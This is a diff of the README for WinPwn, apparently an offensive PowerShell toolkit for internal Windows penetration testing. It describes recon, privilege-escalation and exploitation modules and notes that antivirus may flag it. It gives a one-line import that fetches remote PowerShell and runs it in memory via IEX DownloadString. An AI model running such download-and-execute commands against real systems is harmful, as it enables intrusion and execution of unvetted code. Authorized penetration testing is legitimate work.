S3cur3Th1sSh1t/WinPwn/README.md

 # WinPwn
-Still much work to do - Automation for internal Windows Penetrationtest.
+In many past internal penetration tests I often had problems with the existing Powershell Recon / Exploitation scripts due to missing proxy support.
+For this reason I tried my hand at my own script with automatic proxy recognition and integration.
+The script is mostly based on well-known large other offensive security Powershell projects.
+I only load them one after the other into RAM via IEX Downloadstring and partially automate the execution to save time.

+Yes it is not a C# and it may be flagged by antivirus solutions.
+Windows Defender for example blocks some of the known scripts/functions.

 Different local recon modules, domain recon modules, pivilege escalation and exploitation modules.
 Any suggestions, feedback and comments are welcome!

-Just Import the Modules with "Import-Module .\WinPwn_v0.6.ps1" or with iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/WinPwn/master/WinPwn_v0.6.ps1')
+Just Import the Modules with "Import-Module .\WinPwn_v0.7.ps1" or with iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/WinPwn/master/WinPwn_v0.6.ps1')

 Functions available after Import: